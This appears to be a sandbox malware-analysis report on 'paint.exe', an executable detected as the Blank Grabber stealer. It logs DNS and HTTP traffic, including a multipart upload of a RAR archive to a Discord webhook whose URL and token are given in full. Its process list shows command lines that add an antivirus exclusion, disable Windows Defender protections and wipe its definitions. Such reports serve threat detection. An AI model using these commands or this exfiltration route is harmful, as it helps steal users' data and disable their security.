                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:38.079226017 CET4973880192.168.2.4208.95.112.1
                                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:36.007289886 CET5196653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:36.014350891 CET53519661.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:36.708606005 CET5014253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:36.715662956 CET53501421.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:36.007289886 CET192.168.2.41.1.1.10xb94cStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:36.708606005 CET192.168.2.41.1.1.10x334bStandard query (0)discord.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:36.014350891 CET1.1.1.1192.168.2.40xb94cNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:36.715662956 CET1.1.1.1192.168.2.40x334bNo error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:36.715662956 CET1.1.1.1192.168.2.40x334bNo error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:36.715662956 CET1.1.1.1192.168.2.40x334bNo error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:36.715662956 CET1.1.1.1192.168.2.40x334bNo error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:36.715662956 CET1.1.1.1192.168.2.40x334bNo error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              • discord.com
                                                                                                                                                                                                                                                              • ip-api.com
                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              0192.168.2.449738208.95.112.1802132C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:36.020775080 CET116OUTGET /json/?fields=225545 HTTP/1.1
                                                                                                                                                                                                                                                              Host: ip-api.com
                                                                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                                                                              User-Agent: python-urllib3/2.3.0
                                                                                                                                                                                                                                                              Jan 5, 2025 10:16:36.552270889 CET381INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 05 Jan 2025 09:16:36 GMT
                                                                                                                                                                                                                                                              Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                              Content-Length: 204
                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                              X-Ttl: 60
                                                                                                                                                                                                                                                              X-Rl: 44
                                                                                                                                                                                                                                                              Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 38 39 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                                                                                                                                                                                                                                              Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-189.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.189"}


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              0192.168.2.449739162.159.137.2324432132C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2025-01-05 09:16:37 UTC302OUTPOST /api/webhooks/1325366706595561574/vQDeUuP3YNG10jqpqcayt14YabeOslGKlq6YRX-VMaSv1X0716_bmr9KcFyMQ8vNYrim HTTP/1.1
                                                                                                                                                                                                                                                              Host: discord.com
                                                                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                                                                              Content-Length: 728360
                                                                                                                                                                                                                                                              User-Agent: python-urllib3/2.3.0
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=5504fd0b02b225da5837704d2ec650da
                                                                                                                                                                                                                                                              2025-01-05 09:16:37 UTC16384OUTData Raw: 2d 2d 35 35 30 34 66 64 30 62 30 32 62 32 32 35 64 61 35 38 33 37 37 30 34 64 32 65 63 36 35 30 64 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 42 6c 61 6e 6b 2d 6a 6f 6e 65 73 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 0b a9 f9 a3 21 04 00 00 01 0f 62 a9 f1 7d a6 c4 17 a3 ab 38 a0 c1 36 e3 58 c1 d1 c2 29 0f f6 fe 2b 81 d5 ce 3b c7 e7 7c 1d 5f 54 6f 49 d1 fc 18 e3 4e c8 42 bd 68 c0 77 63 6b 28 a2 7d 8d 47 a3 6c b5 8b c4 a6 5b fc 8e 42 54 18 a6 c1 09 dc 1e e3 c8 11 32 62 c7 0d 4c c5 07 f4 32 37 0a ce 20
                                                                                                                                                                                                                                                              Data Ascii: --5504fd0b02b225da5837704d2ec650daContent-Disposition: form-data; name="file"; filename="Blank-user.rar"Content-Type: application/octet-streamRar!!b}86X)+;|_ToINBhwck(}Gl[BT2bL27
                                                                                                                                                                                                                                                              2025-01-05 09:16:37 UTC16384OUTData Raw: 0e 23 cd 5c de 93 8d 8c c1 d6 10 af 5c cc 31 ce bf 35 51 9a 19 23 10 e3 4d 6c 63 1f c3 a4 b8 d6 f4 b2 be e0 1a 6b 4f 5e 74 c6 ac 25 0b 41 60 71 aa c0 60 4a 81 c5 d7 bb f2 3d 3a d0 8f e7 8d 62 bc 73 d1 a9 06 bd 49 0d 10 f5 b9 a8 e4 db f3 c0 d0 69 53 46 e9 f6 5f b6 8f ca 8b 89 3f 70 0e 68 e2 06 73 07 92 8e a4 d3 46 03 04 86 f4 c2 9e d7 a4 d1 f3 0f 65 a2 91 06 94 c4 70 3f d9 8e c1 00 8d 59 12 0a de 58 b7 1f f5 3d cc d0 88 3f d2 c4 6c 67 b4 d7 6c 44 55 e9 79 5a 5b ba 11 44 23 30 35 3c fe af aa 3b 61 93 4f c4 a2 76 39 e4 f9 6b 3e 55 2b 0e c4 e1 0d c8 c6 8f ba 88 52 04 18 fa d5 ca b6 53 80 de 43 f1 94 3e 24 56 09 f2 7d 7e d6 27 b4 1a 11 6f b8 b5 e2 c1 6b 31 20 6f 1a 1b a3 82 46 c7 a3 aa 44 97 63 98 3b 4a 67 00 7e 49 80 e7 87 73 a4 aa e0 b1 97 3f 88 a3 c6 7a cd
                                                                                                                                                                                                                                                              Data Ascii: #\\15Q#MlckO^t%A`q`J=:bsIiSF_?phsFep?YX=?lglDUyZ[D#05<;aOv9k>U+RSC>$V}~'ok1 oFDc;Jg~Is?z
                                                                                                                                                                                                                                                              2025-01-05 09:16:37 UTC16384OUTData Raw: 1b d9 af 17 30 63 1b 93 c0 e8 16 38 92 60 aa 2d b3 33 de f3 26 49 0a 8f 34 ec a9 15 d5 ba 44 c1 1b f7 0c 9f fd d2 36 9b 4d 84 bd 25 c2 db 34 b5 76 8b 6d c3 ef a5 f3 66 8d 59 9a c8 7c 23 7b 42 f3 45 b5 88 00 f6 71 13 cd 6c 53 f5 3f 7c f2 62 11 8f c7 67 cd f3 a8 7b f2 76 85 77 bd b3 f2 1e 1b 58 53 df dc db e8 e1 3f 4e 17 e4 b3 34 72 4b 51 b0 38 dc 11 94 29 e1 3b 8e 39 40 e9 e4 24 ff 44 38 08 ea 77 0e 9d a1 d2 f6 74 7a 8c f3 82 04 01 f9 d9 4f 01 d9 11 f4 f8 84 b8 85 d0 60 80 ec 5c 74 51 6a 66 71 4c 34 ad 91 c9 cf 78 35 35 3f df 7e 88 04 cc db 97 06 a9 ee c4 8a f2 48 48 ea 49 10 81 00 4d 00 ee 37 30 75 83 13 d9 bf 2b 32 5a 85 d8 53 ea b0 12 4f ec 25 04 7b 6f dd 2a be 6b 8f 34 32 8d 82 8a 57 eb e4 f3 4d 7e 1c be ae d9 9f 0c 5c 76 c6 b3 f3 a7 d1 c0 91 12 87 10
                                                                                                                                                                                                                                                              Data Ascii: 0c8`-3&I4D6M%4vmfY|#{BEqlS?|bg{vwXS?N4rKQ8);9@$D8wtzO`\tQjfqL4x55?~HHIM70u+2ZSO%{o*k42WM~\v
                                                                                                                                                                                                                                                              2025-01-05 09:16:37 UTC16384OUTData Raw: d2 3d b5 b4 aa 7c 5d 70 90 7f 2e 2b db d4 1f 0a bf 10 ef 6b eb 08 fb 20 db df 73 f5 ee c8 5d a4 57 5c 94 88 77 9e 24 9b 9e f9 e3 1b b5 98 37 8f 23 1a 68 36 3c ac 25 31 79 f3 fc ce 40 48 80 3a fa 18 37 57 b2 96 f8 cd fd 90 4b fe 96 aa bb 3e 0f ff e5 64 b6 58 c6 70 24 ee d8 bf 8f 55 f7 79 02 79 60 d5 37 0b f5 c1 01 25 a5 83 11 fa c4 97 7c d5 a4 b6 91 d9 8f 39 a9 0d 01 1b 36 8f f2 9f 42 80 16 06 2b 38 ea 29 62 d4 e0 b7 e3 8a a1 5c ee 52 f5 f7 a5 0c dd 4d e9 f9 f0 5d f4 ab 42 36 22 a3 4e 1f 98 d6 cd 28 76 5a 73 eb 53 1b 33 c3 f6 4f 59 ed 23 25 c8 ab 12 e0 5d 9e 20 b2 ae f7 76 92 70 51 b7 34 b6 bd 43 35 7e f9 5c ad 58 1d 14 97 86 50 42 1e 11 b0 56 00 af 78 b1 09 34 4a d5 99 1b ee ec 93 f1 64 dc 55 d5 bc bd e9 4a 9f 61 0a 1a 47 04 75 8a a6 ef 35 7d ef b0 e5 16
                                                                                                                                                                                                                                                              Data Ascii: =|]p.+k s]W\w$7#h6<%1y@H:7WK>dXp$Uyy`7%|96B+8)b\RM]B6"N(vZsS3OY#%] vpQ4C5~\XPBVx4JdUJaGu5}
                                                                                                                                                                                                                                                              2025-01-05 09:16:37 UTC16384OUTData Raw: 8c 3c 65 c6 3c 25 a9 22 41 bf 6c 1d 08 7f a3 ad ef e9 2f c1 19 5d bf 11 c1 d0 8f d4 d4 9a 11 ba 24 ce 96 4c 42 69 a5 61 4b 59 32 9c 65 9c af 14 d9 5a ae 3d df 69 cd 7c 7a cf 66 0e d5 2c 53 a6 fd 9c c6 b5 d4 6c 6d 0a a6 ab f7 47 da d4 67 db b3 a8 90 39 f3 cb 2f 55 51 ae ed ae cf aa 85 94 58 72 a2 1a ce 17 47 38 e1 4a c9 c1 73 4d 69 41 41 7e ef ce f4 e6 00 cb df 8e 3b 8b c7 f3 7e 3a 84 c2 23 3d 81 0a 2e 7d 16 e7 f1 23 4a f6 57 96 65 03 e9 05 90 f4 28 f3 18 9b 0c af 47 c1 fb 40 c4 71 48 f0 35 e5 38 3d 7f 39 d3 1a 8c 14 14 41 d7 cd ed d2 9d 9e 27 59 87 e5 4b 2c 91 0e aa aa b1 15 b6 cd f6 b3 28 33 d6 f2 c3 73 ad e0 cc e4 76 8a 3c e5 40 ff 6d 13 76 de ce 74 35 d0 9e b4 e7 01 1e b0 32 3c 26 5b dc 15 4c ec 5b b2 01 e8 81 14 cd d3 46 0b a4 86 c0 d6 b1 bb 3c d9 3b
                                                                                                                                                                                                                                                              Data Ascii: <e<%"Al/]$LBiaKY2eZ=i|zf,SlmGg9/UQXrG8JsMiAA~;~:#=.}#JWe(G@qH58=9A'YK,(3sv<@mvt52<&[L[F<;
                                                                                                                                                                                                                                                              2025-01-05 09:16:37 UTC16384OUTData Raw: 39 ce 97 c2 5b ee 99 7c 2c 00 40 bc fb 4a 2c de e4 a5 8a 11 4e b1 6a 7f 31 d6 b1 9b 4b 73 64 a7 fe e2 c0 4b 45 1f 21 90 ac 12 99 96 02 5e e5 1b 91 db ad 17 96 a1 c1 2f 4b ea d7 4b 99 65 79 b4 cf 9f 78 55 ce b5 41 2a 8c d7 53 f5 71 f8 81 e9 cc f5 7c 87 2d ae c3 69 ea ea 49 34 6c c9 c4 ea 16 61 91 c4 5f 59 e7 07 0f 0c 19 8b 52 44 ce 2c f5 e9 31 98 f2 a8 6d 5c 26 a3 4d 83 96 e5 7e 7e 23 64 a6 d5 df 78 ce e4 00 5b fa 33 ae cd 42 45 36 51 d2 c3 c3 6d 7f 32 15 ab 5d ee f9 be 5c 40 dd d7 22 59 d6 bf ca e5 d0 2f a1 db dd 1c 8a 7f c2 fe 75 c9 67 d2 b5 44 c9 cb 0c 7d 91 58 25 de b4 3a 54 fb 0f 9b fb 07 16 ae a7 de 64 90 06 9d ea df 67 1f 92 1f b4 96 eb 84 60 74 49 b4 f7 73 ef 1e 3a 97 c3 59 a9 6e df 1b 7d 01 37 4a 78 67 b4 bd cb 87 13 22 f5 31 e3 20 fb 11 38 85 a8
                                                                                                                                                                                                                                                              Data Ascii: 9[|,@J,Nj1KsdKE!^/KKeyxUA*Sq|-iI4la_YRD,1m\&M~~#dx[3BE6Qm2]\@"Y/ugD}X%:Tdg`tIs:Yn}7Jxg"1 8
                                                                                                                                                                                                                                                              2025-01-05 09:16:37 UTC16384OUTData Raw: 8a bc c1 7e ca 13 f1 b7 df 57 dc 7f b9 92 47 d2 d4 30 4e da 46 68 2d 80 f0 b6 2b 0c 30 cf fb ef 97 02 64 32 01 45 72 fc 3a a0 d2 a8 0a f5 6a fc 31 50 a3 37 7d bb 33 dd 71 05 d4 db 11 e7 ac 90 25 15 b9 e5 68 8e 5a 29 a9 8a 97 2e dd fc c9 5e 36 f2 f7 84 5a 34 48 c8 5d 0f cd 22 b6 3f 74 27 6a 8b 6c 08 a2 e2 eb 8c 1f 3a ed 3c 77 0b 29 0d 8a 83 22 17 bf 6b c0 b2 7c 3d d8 b3 4a 81 2d a5 93 77 16 cc 2a 8d 0f 7a 59 c9 ae ee af 80 2d 0d 78 a9 32 62 34 48 d4 0d d1 dc 31 9a ff 42 1d c5 1a 7c 8c 7e 2d c5 6b 44 19 b5 35 99 7b 87 d0 fb 07 26 6f de 79 9f e4 7d 4d fd ed f4 91 44 78 ca 0b f0 3b 3b 07 3f 1a c7 d6 53 f7 03 ee b0 d8 00 a3 9e c3 50 9a 31 3c b5 6c 1e a0 be 45 d4 69 c0 85 a1 00 9b 61 a7 bf 14 e3 fc 5c 18 ac fc c0 a9 6b a6 80 d5 34 6b 69 f6 47 d4 cb 4e 24 78 60
                                                                                                                                                                                                                                                              Data Ascii: ~WG0NFh-+0d2Er:j1P7}3q%hZ).^6Z4H]"?t'jl:<w)"k|=J-w*zY-x2b4H1B|~-kD5{&oy}MDx;;?SP1<lEia\k4kiGN$x`
                                                                                                                                                                                                                                                              2025-01-05 09:16:37 UTC16384OUTData Raw: 70 58 55 c1 8c a5 da b0 1d f1 e8 83 c2 86 c5 70 6e e8 4d af 87 f6 5e cf 74 6c fe 57 f9 c9 fe 7a 79 07 64 b2 3a 44 1c d2 7c 06 7d 64 1e ff e4 83 5c f1 76 73 32 c5 2e c0 d9 40 ab a5 8c 8f 37 af 2e 4b cd 68 36 11 1a f6 2c f7 b1 da 44 e9 8f 1d f8 4b b8 8a 9a ea e7 a3 f8 b9 ad 16 c5 c6 0f 1b dc bf 2a 2d 1f 3e a2 32 af f9 f3 4f c8 d5 91 c2 54 aa ad f0 91 a9 58 da dd 29 b1 c3 e9 97 11 a4 7a 1d 84 9b d7 0d 1b f1 98 52 16 3e b8 3c 1c 9a 4a 2d 5e a1 9c be 39 e6 9a 51 7e c1 dd b4 2e 57 36 5b 04 64 13 62 54 82 31 aa 71 40 2a 1e cd ae d5 82 b1 e1 2a a4 69 0f b8 17 de 66 80 f8 89 43 89 fd d9 43 cd b1 e8 8e 31 ac 39 60 a5 65 f8 54 56 8a 66 04 43 91 0b 3c 27 ed e2 93 14 90 e2 90 63 32 70 99 af 2c 8f 49 c2 48 50 5e a1 58 74 a6 4c 15 f1 d6 67 16 50 8b f7 20 8e c5 9e a4 26
                                                                                                                                                                                                                                                              Data Ascii: pXUpnM^tlWzyd:D|}d\vs2.@7.Kh6,DK*->2OTX)zR><J-^9Q~.W6[dbT1q@**ifCC19`eTVfC<'c2p,IHP^XtLgP &
                                                                                                                                                                                                                                                              2025-01-05 09:16:37 UTC16384OUTData Raw: b2 a6 a5 7f 0b 87 1c 83 65 0d ab 5d 0c b1 1f e5 a8 d1 49 89 4e 6e 84 8e 58 e8 41 d6 78 1d a2 80 99 a0 d6 7f b6 d0 58 01 70 38 4b d2 1a 66 c3 f7 03 58 72 ad ad 95 01 97 93 46 95 9c 90 6e 51 9e ef 44 b1 ad 11 ac 2f a9 c9 c4 59 e4 07 cb b4 36 12 17 89 38 01 53 bd 9f 92 92 4d 35 7c ad 5f cf e2 a0 47 51 31 52 2c 9f fe 80 e8 50 b1 c0 74 14 ec 83 e5 10 c5 d5 3d c3 48 72 b5 0b 4f 83 9a 15 c4 01 88 36 91 c1 7d 4e 73 41 d6 10 5c e9 e1 83 77 b3 b6 af c4 6b c1 57 6a 6a d6 27 dc 9d 88 5e e8 a6 c1 f2 ed f2 5f ad 3b cd 8b 68 a5 51 75 6e 5d e3 0c 4d d2 56 0c 51 6d de 26 77 b9 5f fe 22 8f b1 16 e3 e6 49 4d 38 ed bd 54 e8 bc 08 dd ae 41 5f ba d4 9a b7 2b f6 af 4b bb 17 10 b5 11 b4 8a c2 c0 1e 90 ca 29 3c 46 51 92 af c5 c9 68 70 3b ec 86 0f 5e 5a 3a dc 98 14 33 6f f8 8b 8a
                                                                                                                                                                                                                                                              Data Ascii: e]INnXAxXp8KfXrFnQD/Y68SM5|_GQ1R,Pt=HrO6}NsA\wkWjj'^_;hQun]MVQm&w_"IM8TA_+K)<FQhp;^Z:3o
                                                                                                                                                                                                                                                              2025-01-05 09:16:37 UTC16384OUTData Raw: 3d 8b 0d 51 a4 03 4f 8b ac e1 61 12 7e dc 04 ff 69 45 d5 c4 71 f7 47 da 62 5c 76 f5 71 86 d5 a2 46 f3 8c e3 84 6b 97 0b 02 87 a4 37 c7 50 7d a2 f6 72 67 45 0f 2c 7a fb 84 19 73 c4 f0 4f 41 1a 25 be 98 10 86 38 7d 02 f4 a5 ff 4f 78 90 cc 54 1f cf af ba 31 78 96 8d 8a a4 a7 f0 09 2a 99 75 a6 ec 23 1a ce 5c ff 23 2e cd bc ef 1b 3a a3 0d 94 c1 cc 8e 17 94 7b cc ad e4 74 c6 02 99 95 8c f5 a3 4f b4 10 ec 35 38 81 43 41 15 ad c0 fb 10 a9 c2 1c 22 a5 38 af f9 10 88 5d 01 88 34 cc 1e a0 72 b3 9f 11 63 c8 5a 29 13 93 0c 80 c8 dc 07 53 c5 74 f9 39 8e c3 bb 14 79 18 21 0b 98 7c b0 4f 00 2f 5e 8e 2b 30 38 2f e4 9e 3e 7e 20 33 a3 df b7 3a 31 55 39 33 d2 74 19 52 d3 e5 4d 74 4c 9c ea f7 40 23 a2 ab 25 5c 48 11 7f 00 b3 a6 e6 db 6c 3b 51 2a 01 ef 11 bc dc 6d 8d 07 9a 2a
                                                                                                                                                                                                                                                              Data Ascii: =QOa~iEqGb\vqFk7P}rgE,zsOA%8}OxT1x*u#\#.:{tO58CA"8]4rcZ)St9y!|O/^+08/>~ 3:1U93tRMtL@#%\Hl;Q*m*
                                                                                                                                                                                                                                                              2025-01-05 09:16:37 UTC1263INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                              Date: Sun, 05 Jan 2025 09:16:37 GMT
                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                              Content-Length: 45
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=3600, s-maxage=3600
                                                                                                                                                                                                                                                              strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                              x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                              x-ratelimit-limit: 5
                                                                                                                                                                                                                                                              x-ratelimit-remaining: 4
                                                                                                                                                                                                                                                              x-ratelimit-reset: 1736068599
                                                                                                                                                                                                                                                              x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                              via: 1.1 google
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TD8%2FG%2Boni%2BnWwIq8RmUSuAHrutMTwdF2QH58uv%2BCizcFnzmM5qaI1%2BrUWuEisXltQ5GQ6yAgFnPCohw6oWmBtNJO%2BAGl5o8QX8vxChfza9%2FfuxfjkpWiZyakFHdx"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              Set-Cookie: __cfruid=b23ede6a2683bc41436838bfd0b40396a9211394-1736068597; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                              Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                              Set-Cookie: _cfuvid=WzXRjZZPUtRwjwHI2vQUBHc9MsDw.9t6IlQXS7UdZ5g-1736068597806-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8fd25edcdfaa42db-EWR


                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                                                              Start time:04:16:02
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\paint.exe"
                                                                                                                                                                                                                                                              Imagebase:0x7ff6f0bd0000
                                                                                                                                                                                                                                                              File size:8'809'834 bytes
                                                                                                                                                                                                                                                              MD5 hash:14F0421574FD16A0A6A7AC20FE22482B
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1673300933.0000023393145000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1673300933.0000023393147000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:1
                                                                                                                                                                                                                                                              Start time:04:16:03
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\paint.exe"
                                                                                                                                                                                                                                                              Imagebase:0x7ff6f0bd0000
                                                                                                                                                                                                                                                              File size:8'809'834 bytes
                                                                                                                                                                                                                                                              MD5 hash:14F0421574FD16A0A6A7AC20FE22482B
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.2003846185.000002077225D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.2008427127.0000020771390000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:2
                                                                                                                                                                                                                                                              Start time:04:16:05
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\paint.exe'"
                                                                                                                                                                                                                                                              Imagebase:0x7ff66a4e0000
                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:3
                                                                                                                                                                                                                                                              Start time:04:16:05
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                                                                                                                                                                                              Imagebase:0x7ff66a4e0000
                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:4
                                                                                                                                                                                                                                                              Start time:04:16:05
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                                                                                              Start time:04:16:05
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Success!', 0, '@.4xray_', 48+16);close()""
